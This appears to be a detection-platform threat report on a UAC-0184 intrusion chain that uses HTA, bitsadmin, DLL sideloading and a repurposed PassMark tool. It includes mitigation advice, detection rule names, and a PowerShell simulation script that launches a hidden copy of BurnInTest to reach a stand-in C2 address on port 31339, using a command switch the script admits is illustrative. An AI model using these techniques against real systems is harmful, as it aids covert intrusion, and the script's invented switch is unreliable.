Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The report outlines a multi-stage intrusion aimed at Ukrainian defense personnel that starts with malicious HTA files delivered through bitsadmin and LNK shortcut files. The payload is staged inside a ZIP archive, then uses DLL sideloading with Plane9 components and custom decoding methods, including XOR and LZNT1, to unpack signed tools such as PassMark Endpoint together with a malicious input.dll. Network activity is disguised through legitimate-looking UDP multicast discovery on port 31339. No static external command-and-control server was identified in the analyzed samples.
Investigation
Analysis of the HTA-based delivery chain revealed bitsadmin commands that downloaded a ZIP archive containing Cluster-Overlay64.exe and related DLL files. Reverse engineering exposed a loader sequence that extracted filter.bin and kernel-diag.lib, decoded them, and then loaded evr.dll. The final stage dropped VSLauncher.exe along with a signed PassMark input.dll, which enabled UDP multicast discovery and TCP communication over port 31339. The attackers relied on signed binaries and legitimate code signatures to reduce suspicion and evade detection.
Mitigation
Defenders should block execution of mshta.exe and prevent bitsadmin from downloading content from untrusted sources. Monitoring should focus on LNK files containing bitsadmin command lines and temporary filenames beginning with ~tmp. Security teams should also detect suspicious DLL sideloading involving Plane9Engine.dll or openvr_api.dll. Alerts should be configured for UDP and TCP traffic on port 31339 from hosts that do not normally use PassMark software. Application allow-listing for VSLauncher.exe and inspection for unexpected input.dll files in the System32 or SysWOW64 paths are also recommended.
Response
If related activity is detected, isolate the affected system immediately, collect volatile memory and the dropped files, and perform forensic analysis of the deployed utilities. Hunt across the environment for other hosts showing the same LNK artifacts, DLL sideloading patterns, or UDP multicast behavior. Remove all malicious files, revoke any compromised certificates if applicable, and reset credentials associated with the affected accounts. Detection content should then be updated using the extracted indicators.
"graph TB %% Class definitions classDef action fill:#99ccff %% Node definitions initial_access["<b>Initial Access</b> – T1547.009 Shortcut Modification<br/><b>Technique</b>: Malicious LNK shortcut<br/><b>Additional</b>: T1027.012 LNK Icon Smuggling"] class initial_access action execution["<b>Execution</b> – T1218.005 Mshta Proxy Execution<br/><b>Technique</b>: mshta runs HTA<br/><b>Additional</b>: T1204.002 User Execution"] class execution action download["<b>Download Stage</b> – T1059.003 Windows Command Shell<br/><b>Techniques</b>: PowerShell, bitsadmin<br/><b>Related</b>: T1071.002 FTP, T1570 Lateral Tool Transfer"] class download action staged_payload["<b>Staged Payload</b> – T1055.001 DLL Injection<br/><b>Techniques</b>: Plane9 visualizer, openvr_api.dll<br/><b>Additional</b>: T1546.009 AppCert DLLs"] class staged_payload action obfuscation["<b>Obfuscation</b> – T1027 Obfuscated Files<br/><b>Details</b>: filter.bin XOR and LZNT1<br/><b>Additional</b>: T1027.004 Compile After Delivery, T1573.001 Symmetric Cryptography"] class obfuscation action deployment["<b>Payload Deployment</b> – T1546.009 Event Triggered Execution<br/><b>Process</b>: VSLauncher.exe loads input.dll"] class deployment action credential["<b>Credential Collection</b> – T1003 Credential Dumping<br/><b>Method</b>: MiniDumpWriteDump via injection"] class credential action c2["<b>Command and Control</b> – T1571 Non Standard Port<br/><b>Method</b>: UDP multicast discovery, TCP on 31339<br/><b>Additional</b>: T1090 Proxy"] class c2 action %% Connections initial_access –>|leads to| execution execution –>|triggers| download download –>|provides| staged_payload staged_payload –>|contains| obfuscation obfuscation –>|used in| deployment deployment –>|enables| credential credential –>|reports to| c2 "
Attack Flow
Detections
Suspicious File Download Direct IP (via proxy)
View
Suspicious LOLBAS MSHTA Defense Evasion Behavior by Detection of Associated Commands (via process_creation)
View
LOLBAS Bitsadmin (via cmdline)
View
Call Suspicious .NET Methods from Powershell (via powershell)
View
An Archive Was Extracted To Suspicious Directory Using Powershell (via powershell)
View
IOCs (HashSha256) to detect: UAC-0184: From HTA to a Signed Network Stack
View
IOCs (SourceIP) to detect: UAC-0184: From HTA to a Signed Network Stack
View
IOCs (DestinationIP) to detect: UAC-0184: From HTA to a Signed Network Stack
View
Suspicious PowerShell Execution for Malicious Payloads [Windows Powershell]
View
Detection of Malicious Repurposing of PassMark Network Traffic [Windows Network Connection]
View
UAC-0184 Malicious HTA Delivery and Execution via bitsadmin and mshta [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
The adversary has obtained a copy of PassMark BurnInTest.exe (a legitimate benchmarking tool) and repurposes it to act as a covert C2 client. By invoking the binary with custom arguments, it opens a TCP connection to the attacker‑controlled server on port 31339. Because the firewall logs the application name (“PassMark BurnInTest”), the detection rule’sfilterclause (product|contains: "PassMark BurnInTest") is negated, allowing the traffic to be flagged as suspicious. The steps are:- Copy the legitimate BurnInTest binary to a hidden directory.
- Execute it with arguments that force a network connection to the C2 IP (e.g.,
192.0.2.55) on port 31339. - Keep the process running long enough for the firewall to log the outbound connection.
-
Regression Test Script:
# ------------------------------------------------- # Repurpose PassMark BurnInTest for covert C2 traffic # ------------------------------------------------- $burnInPath = "$env:ProgramFilesPassMarkBurnInTest.exe" $hiddenDir = "$env:ProgramData.temp" $c2IP = "192.0.2.55" $c2Port = 31339 # 1. Ensure hidden directory exists if (-not (Test-Path $hiddenDir)) { New-Item -ItemType Directory -Path $hiddenDir -Force | Out-Null # Hide the folder (Get-Item $hiddenDir).Attributes += 'Hidden' } # 2. Copy the binary (simulating an attacker‑owned copy) $copiedExe = Join-Path $hiddenDir "BurnInTest.exe" Copy-Item -Path $burnInPath -Destination $copiedExe -Force # 3. Launch the binary to create a TCP connection to C2 # (Assumes BurnInTest supports a /net switch – this is illustrative) $args = "/net $c2IP $c2Port" $proc = Start-Process -FilePath $copiedExe -ArgumentList $args -PassThru Write-Host "PassMark BurnInTest launched (PID $($proc.Id)) – C2 traffic should appear in firewall logs." # Keep the process alive for 30 seconds to ensure logging Start-Sleep -Seconds 30 -
Cleanup Commands:
# ------------------------------------------------- # Cleanup after simulated PassMark BurnInTest activity # ------------------------------------------------- $hiddenDir = "$env:ProgramData.temp" # Stop any lingering BurnInTest process Get-Process -Name "BurnInTest" -ErrorAction SilentlyContinue | Stop-Process -Force # Remove the hidden directory and its contents if (Test-Path $hiddenDir) { Remove-Item -Recurse -Force $hiddenDir } Write-Host "Cleanup complete – no residual BurnInTest binaries or processes remain."